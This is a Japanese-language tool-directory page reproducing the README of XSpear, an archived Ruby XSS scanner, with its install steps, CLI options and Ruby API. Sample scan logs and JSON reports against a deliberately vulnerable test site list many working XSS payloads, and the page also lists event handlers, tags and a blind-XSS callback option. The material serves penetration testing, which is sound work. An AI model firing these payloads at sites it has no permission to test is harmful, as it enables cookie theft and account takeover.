Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/hahwul/xspear
偵察静的分析脆弱性スキャナーウェブ脆弱性スキャナー動的分析 (サンドボックス)脆弱性分析スクリプトと自動化情報収集ウェブセキュリティファジングペネトレーションテストArchived
1.4k240106ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
hahwul/xspear

XSpear

🔱 パワフルなXSSスキャンとパラメータ分析ツール&gem

リポジトリを見る

XSpear

XSpear は ruby gems 上で動作する XSS スキャナーです。

[!IMPORTANT] XSpear リポジトリはアーカイブされました

このリポジトリはアーカイブされ、読み取り専用になりました。
XSpear は積極的にメンテナンスされなくなりました。

代わりに Dalfox をお試しください 🌙🦊

より高速で強力な、高度な機能を備えた XSS スキャナーです。

→ https://github.com/hahwul/dalfox

主要機能

  • パターンマッチングベースの XSS スキャン
  • ヘッドレスブラウザでの alert confirm prompt イベントを検出 (Selenium 使用)
  • XSS プロテクションバイパスと reflected (またはすべての) パラメータのためのリクエスト/レスポンステスト
    • 反射パラメータ
    • すべてのパラメータ (ブラインド XSS など、あらゆる用途向け)
    • フィルタリングテスト event handler HTML tag Special Char Useful code
    • あなただけのカスタムペイロードテスト!
  • ブラインド XSS のテスト (XSS Hunter、ezXSS、HBXSS など、すべての URL ベースのブラインドテスト...)
  • 動的/静的解析
    • SQL エラーパターンの検出
    • セキュリティヘッダーの解析 (CSP HSTS X-frame-options、XSS-protection など)
    • その他のヘッダーの解析 (サーバーバージョン、Content-Type など)
    • URI パスへの XSS テスト
    • パラメータのみの解析テスト (別名 no-XSS モード)
  • Raw ファイルからのスキャン (Burp Suite、ZAP リクエスト)
  • XSpear は Ruby コード上で動作 (Gem ライブラリ使用)
  • table base cli-report、、 (URL) を表示

インストール

自分でインストールする方法:

root@kitploit:~
$ gem install XSpear

または、自分でインストールする方法 (ローカルファイル / 最新版 をダウンロード):

root@kitploit:~
$ gem install XSpear-{version}.gem

この行をアプリケーションの Gemfile に追加してください:```ruby gem 'XSpear'

root@kitploit:~
そして実行してください:

    $ bundle

### 依存関係のgem
`colorize` `selenium-webdriver` `terminal-table` `progress_bar`<br>
自動インストールするようにGemライブラリに設定したが、正常に動作しない場合は、次のコマンドでインストールしてください。```
$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table
$ gem install progress_bar

CLIでの使い方```

Usage: xspear -u [target] -[options] [value] [ e.g ] $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a $ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2 $ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json

[ Options ] -u, --url=target_URL [required] Target Url -d, --data=POST Body [optional] POST Method Body data -a, --test-all-params [optional] test to all params(include not reflected) --no-xss [optional] no testing xss, only parameters analysis --headers=HEADERS [optional] Add HTTP Headers --cookie=COOKIE [optional] Add Cookie --custom-payload=FILENAME [optional] Load custom payload json file --raw=FILENAME [optional] Load raw file(e.g raw_sample.txt) -p, --param=PARAM [optional] Test paramters -b, --BLIND=URL [optional] Add vector of Blind XSS + with XSS Hunter, ezXSS, HBXSS, etc... + e.g : -b https://hahwul.xss.ht -t, --threads=NUMBER [optional] thread , default: 10 -o, --output=FORMAT [optional] Output format (cli , json) -c, --config=FILENAME [optional] Using config.json -v, --verbose=0~3 [optional] Show log depth + v=0 : quite mode(only result) + v=1 : show scanning status(default) + v=2 : show scanning logs + v=3 : show detail log(req/res) -h, --help Prints this help --version Show XSpear version --update Show how to update

root@kitploit:~
### 結果タイプ
- (I)NFO: 情報を取得 (例: SQLエラー, フィルタリングされたルール, 反映されたパラメータなど)
- (V)UNL: 脆弱なXSS, Seleniumでalert/prompt/confirmをチェック
- (L)OW: 低レベルの問題
- (M)EDIUM: 中レベルの問題
- (H)IGH: 高レベルの問題

### 詳細モード
**[0] 静寂モード(結果のみ表示)**```
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 0
you see report

[1] プログレスバーを表示 (デフォルト)``` $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 1 [] analysis request.. [] used test-reflected-params mode(default) [] creating a test query [for reflected 2 param + blind XSS ] [] test query generation is complete. [249 query] [*] starting XSS Scanning. [10 threads]

[#######################################] [249/249] [100.00%] [01:05] [00:00] [ 3.83/s] ... you see report

root@kitploit:~
**[2] スキャンログを表示**```
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
[*] analysis request..
[I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]
[-] [22:42:41] [200/OK] 'STATIC' not reflected
[-] [22:42:41] [200/OK] 'cat' not reflected <script>alert(45)</script>
[I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
[I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]
[-] [22:42:54] [200/OK] 'cat' not reflected 
[-] [22:42:54] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
[H] [22:42:54] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
[V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
...
you see report

[3] スキャン詳細ログを表示``` $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3 [] analysis request.. [-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url [ Request ] {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["/"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]} [ Response ] {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]} [-] [22:56:21] [200/OK] 'STATIC' not reflected [-] [22:56:21] [200/OK] cat=123rEfe6 in url ... [] used test-reflected-params mode(default) [] creating a test query [for reflected 2 param + blind XSS ] [] test query generation is complete. [249 query] [] starting XSS Scanning. [10 threads] ... [ Request ] {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]} [ Response ] {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]} [H] [22:57:33] [200/OK] reflected [param: cat][reflected onfocus XSS Code] ... you see report

root@kitploit:~
### ケースバイケース
**XSSスキャン**```
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"

JSON出力のみ``` $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0

root@kitploit:~
**スキャンスレッドの設定**```
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30

選択されたパラメータでのテスト``` $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test

root@kitploit:~
**すべてのパラメータでのテスト**<br>
(このオプションはリフレクションの有無にかかわらずテストされます。)```
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a

テスト専用のパラメータ分析(別名 no-xss モード)
``` $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" --no-xss

root@kitploit:~
**Testing blind xss(all params)**<br>
(Blind XSSはどこにでも存在するため、可能な限り使用すべき)<br>```
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a

# Set your blind xss host. <-b options>

カスタムペイロードのテスト
``` $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" --custom-payload=custom_payload.json

root@kitploit:~
custom_payload.json ファイル内```json
[
  {
    "payload":"<svg/onload=alert(1)>",
    "callback":"P1",
    "descript":"blahblah~"
  },
  {
    "payload":"<svg/onload=alert(1)>",
    "callback":"P2",
    "descript":"blahblah~"
  },
  {
    "payload":"<>",
    "callback":"P1",
    "descript":"blahblah~"
  }
]

Pipeline用
``` $ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json

-u : target

-b : testing blind xss

-a : test all params(test to not reflected param)

-v : verbose, not showing logs at value 1.

-o : output optios, json!

root@kitploit:~
結果のJSONデータ```
{
    "starttime": "2019-12-25 00:02:58 +0900",
    "endtime": "2019-12-25 00:03:31 +0900",
    "issue_count": 25,
    "issue_list": [{
        "id": 0,
        "type": "INFO",
        "issue": "DYNAMIC ANALYSIS",
        "method": "GET",
        "param": "cat",
        "payload": "XsPeaR\"",
        "description": "Found SQL Error Pattern"
    }, {
        "id": 1,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Found Server: nginx/1.4.1"
    }, {
        "id": 2,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not set HSTS"
    }, {
        "id": 3,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Content-Type: text/html"
    }, {
        "id": 4,
        "type": "LOW",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not Set X-Frame-Options"
    }, {
        "id": 5,
        "type": "MIDUM",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not Set CSP"
    }, {
        "id": 6,
        "type": "INFO",
        "issue": "REFLECTED",
        "method": "GET",
        "param": "cat",
        "payload": "rEfe6",
        "description": "reflected parameter"
    }, {
        "id": 7,
        "type": "INFO",
        "issue": "FILERD RULE",
        "method": "GET",
        "param": "cat",
        "payload": "onhwul=64",
        "description": "not filtered event handler on{any} pattern"
    }
....
, {
        "id": 17,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<audio src onloadstart=alert(45)>",
        "description": "reflected HTML5 XSS Code"
    }, {
        "id": 18,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<keygen autofocus onfocus=alert(45)>",
        "description": "reflected onfocus XSS Code"
 ....
    }, {
        "id": 24,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<marquee onstart=alert(45)>",
        "description": "triggered <marquee onstart=alert(45)>"
    }]
}

(Items marked as triggered are actually payloads that work in the browser.)

XSpear on Burpsuite
https://github.com/hahwul/XSpear/tree/master/forBurp

など...

サンプルログ

XSSのスキャン``` xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z" ) ( ( /( )\ ) )())(()/( ( ) ( (()\ /())` ) ))\ ( /( )( __(()()) /(/( /(())())(()
\ / // |(()\ ()) (() (()

< __ | '_ )/ -_)/ _ || '_| /_/\_\|___/| .__/ \___|\__,_||_| /> |_| \ /< {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================- / \< \> [ v1.4.0 ] [*] analysis request.. [*] used test-reflected-params mode(default) [*] creating a test query [for reflected 1 param ] [*] test query generation is complete. [251 query] [*] starting XSS Scanning. [10 threads] ...snip... [*] finish scan. the report is being generated.. +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+ | [ XSpear report ] | | http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fff... (snip) | | 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues. | +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+ | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION | +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+ | 0 | INFO | STATIC ANALYSIS | GET | - | <original query> | Found Server: nginx/1.4.1 | | 1 | INFO | STATIC ANALYSIS | GET | - | <original query> | Not set HSTS | | 2 | INFO | STATIC ANALYSIS | GET | - | <original query> | Content-Type: text/html | | 3 | LOW | STATIC ANALYSIS | GET | - | <original query> | Not Set X-Frame-Options | | 4 | MIDUM | STATIC ANALYSIS | GET | - | <original query> | Not Set CSP | | 5 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern | | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter | | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern | | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code | | 9 | HIGH | XSS | GET | cat | <marquee onstart=alert(45)> | reflected HTML5 XSS Code | | 10 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert45`"> | reflected HTML5 XSS Code | | 11 | HIGH | XSS | GET | cat | | reflected onfocus XSS Code | | 12 | HIGH | XSS | GET | cat | | reflected onfocus XSS Code | | 13 | HIGH | XSS | GET | cat | | reflected onfocus XSS Code | | 14 | HIGH | XSS | GET | cat | <audio src onloadstart=alert(45)> | reflected HTML5 XSS Code | | 15 | HIGH | XSS | GET | cat | <meter onmouseover=alert(45)>0 | reflected HTML5 XSS Code | | 16 | HIGH | XSS | GET | cat | "> | reflected XSS Code | | 17 | HIGH | XSS | GET | cat | <video controls/poster/onerror=alert(45)> | reflected HTML5 XSS Code | | 18 | HIGH | XSS | GET | cat | | reflected onfocus XSS Code | | 19 | VULN | XSS | GET | cat | alert(45) | triggered | | 20 | HIGH | XSS | GET | cat | | triggered | | 21 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert(45)"> | triggered <details/open/ontoggle="alert(45)"> | | 22 | HIGH | XSS | GET | cat | | triggered | | 23 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> | +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+ < Available Objects > [cat] param

ツールをダウンロード
filtered rule
testing raw query
  • 選択したパラメータでのテスト
  • 出力形式をサポート cli json html
    • cli
    • json
    • html
  • Verbose レベルをサポート (0〜3)
    • 0: サイレントモード (結果のみ)
    • 1: スキャン状況を表示 (デフォルト)
    • 2: スキャンログを表示
    • 3: 詳細ログを表示 (リクエスト/レスポンス)
  • あらゆる攻撃ベクトルをテストするためのカスタムコールバックコードをサポート
  • 設定ファイルをサポート
    • Available Special Char: ` ( \ ' { ) } [ : $ ]
    • Available Event Handler: "onBeforeEditFocus","onAbort","onActivate","onAfterUpdate","onBeforeCopy","onAfterPrint","onBeforeActivate","onBeforeCut","onBeforeDeactivate","onChange","onBeforePrint","onBounce","onBeforeUnload","onCellChange","onBeforePaste","onClick","onBegin","onBlur","onBeforeUpdate","onDataSetChanged","onCut","onDblClick","onCopy","onContextMenu","onDataSetComplete","onDeactivate","onDataAvailable","onControlSelect","onDrag","onDrop","onDragEnd","onEnd","onDragLeave","onDragStart","onDragOver","onDragEnter","onDragDrop","onError","onErrorUpdate","onFinish","onFilterChange","onKeyPress","onHelp","onFocus","onInput","onHashChange","onKeyDown","onFocusIn","onFocusOut","onMessage","onMouseDown","onLoad","onLayoutComplete","onMouseEnter","onLoseCapture","onloadstart","onMediaError","onKeyUp","onMediaComplete","onMouseOver","onMouseWheel","onMove","onMouseMove","onMouseOut","onOffline","onMoveStart","onMouseLeave","onMouseUp","onMoveEnd","onPropertyChange","onOnline","onPause","onPaste","onReadyStateChange","onRedo","onProgress","onPopState","onOutOfSync","onRepeat","onResume","onRowExit","onReset","onResizeEnd","onRowsEnter","onResizeStart","onReverse","onRowDelete","onRowInserted","onResize","onStop","onSeek","onSelect","onSubmit","onStorage","onStart","onScroll","onSelectionChange","onSyncRestored","onSelectStart","onUnload","ontouchstart","onbeforescriptexecute","onTimeError","onURLFlip","ontouchmove","ontouchend","onTrackChange","onUndo","onafterscriptexecute","onpointermove","onpointerleave","onpointerup","onpointerover","onpointerdown","onpointerenter","onloadstart","onloadend","onpointerout"
    • Available HTML Tag: "script","img","embed","video","audio","meta","style","frame","iframe","svg","object","frameset","applet"
    • Available Useful Code: "document.cookie","document.location","window.location"

    < Raw Query > [0] http://testphp.vulnweb.com/listproducts.php?- ..snip.. [19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E&zfdfasdf=124fffff [20] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E&zfdfasdf=124fffff [21] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E&zfdfasdf=124fffff [22] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E&zfdfasdf=124fffff [23] http://testphp.vulnweb.com/listproducts.php?cat=123'%22%3E%3Csvg/onload=alert(45)%3E&zfdfasdf=124fffff

    ...snip...

    root@kitploit:~
    **JSONへ**```
    $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fffff" -v 1 -o json
    {"starttime":"2019-08-14 23:58:12 +0900","endtime":"2019-08-14 23:58:44 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":3,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":4,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":5,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":6,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video controls/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\">","description":"reflected XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":20,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":21,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"},{"id":22,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":23,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"}]}
    

    rubyコードでの使用法```ruby

    require 'XSPear'

    Set options

    options = {} options['thread'] = 30 options['cookie'] = "data=123" options['blind'] = "https://hahwul.xss.ht" options['output'] = json

    Create XSpear object with url, options

    s = XspearScan.new "https://www.hahwul.com?target_url", options

    Scanning

    s.run result = s.report.to_json r = JSON.parse result

    root@kitploit:~
    ## スキャンモジュールの追加
    **1) `makeQueryPattern` を追加**```ruby
    makeQueryPattern('type', 'query,', 'pattern', 'category', "description", "callback funcion")
    # type: f(ilterd?) r(eflected?) x(ss?)
    # category i(nfo) v(uln) l(ow) m(edium) h(igh) 
    
    # e.g 
    # makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)
    

    2) 他のコールバックの場合、ScanCallbackFunc をオーバーライドするコールバッククラスを記述します 例```ruby class CallbackStringMatch < ScanCallbackFunc def run if @response.body.include? @query [true, "reflected #{@query}"] else [false, "not reflected #{@query}"] end end end

    root@kitploit:~
    親クラス(ScanCallbackFunc)```ruby
    class ScanCallbackFunc()
        def initialize(url, method, query, response)
          @url = url
          @method = method
          @query = query
          @response = response
          # self.run
        end
        
        def run
          # override
        end
    end
    

    Common Callback Class

    • CallbackXSSSelenium
    • CallbackErrorPatternMatch
    • CallbackCheckHeaders
    • CallbackStringMatch
    • CallbackNotAdded
    • など...

    更新

    通常のユーザーの場合``` $ gem update XSpear

    root@kitploit:~
    開発者の場合 (ソフト)```
    $ git pull -v
    

    開発者の場合(難しい)``` $ git reset --hard HEAD; git pull -v

    root@kitploit:~
    ## RubyDoc
    https://www.rubydoc.info/gems/XSpear/
    
    ## Development
    
    リポジトリをチェックアウトした後、`bin/setup`を実行して依存関係をインストールします。次に、`rake spec`を実行してテストを実行します。`bin/console`を実行して、実験用のインタラクティブプロンプトを使用することもできます。
    
    このgemをローカルマシンにインストールするには、`bundle exec rake install`を実行してください。新しいバージョンをリリースするには、`version.rb`のバージョン番号を更新し、`bundle exec rake release`を実行します。これにより、バージョンのgitタグが作成され、gitコミットとタグがプッシュされ、`.gem`ファイルが[rubygems.org](https://rubygems.org)にプッシュされます。
    
    ## Contributing
    
    バグ報告とプルリクエストはGitHubのhttps://github.com/hahwul/XSpearで歓迎します。このプロジェクトは安全で歓迎的なコラボレーションの場を意図しており、貢献者は[Contributor Covenant](http://contributor-covenant.org)の行動規範に従うことが期待されています。
    
    ## Donate
    
    私はコーヒーが好きです!コーヒー中毒です。<br>
    <a href="https://www.paypal.me/hahwul"><img src="https://www.paypalobjects.com/digitalassets/c/website/logo/full-text/pp_fc_hl.svg" height="50px"></a>
    <a href="https://www.buymeacoffee.com/hahwul"><img src="https://assets.kitploit.com/production/public/readmes/2747/56bc6586ee8d5a934750957d1d15bf5ac2bb398d3c3bff0a78114df20e89687e.png" alt="Buy Me A Coffee" height="50px"></a>
    
    ## License
    
    このgemは[MIT License](https://opensource.org/licenses/MIT)の条件の下でオープンソースとして利用可能です。
    
    ## Code of Conduct
    
    XSpearプロジェクトのコードベース、イシュートラッカー、チャットルーム、メーリングリストでやり取りするすべての人は、[行動規範](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md)に従うことが期待されています。
    
    ## ScreenShot
    < スキャンイメージ>
    <img src="https://assets.kitploit.com/production/public/readmes/2747/9deafaf1aa43fb40a938e5dc3034189761eb5ecae3b2ac22e21cb81c1cc8e357.png" width=100%>
    < CLIレポート 1 >
    <img src="https://assets.kitploit.com/production/public/readmes/2747/164f66836cb974e247d9a23edea7c9a5ca8231361a410f7940828a27f58aa4ca.png" width=100%>
    < CLIレポート 2 >
    <img src="https://assets.kitploit.com/production/public/readmes/2747/f8557327e86d61fdd1f5c1e75bb9cc592d878a34cb9f14f5198e1215bce1b6fb.png" width=100%>
    < JSONレポート >
    <img src="https://assets.kitploit.com/production/public/readmes/2747/e4ca84f8cf446a81d68932e24923fa8c0d1283dc54e92358c81392dc3b69bd3c.png" width=100%>
    < HTMLレポート >
    <img src="https://assets.kitploit.com/production/public/readmes/2747/de6fd664cd2052d6d099141b6943819aae71ef4d6c58890be748595d5a104044.png" width=100%>
    
    ## Video
    [![asciicast](https://asciinema.org/a/290126.svg)](https://asciinema.org/a/290126)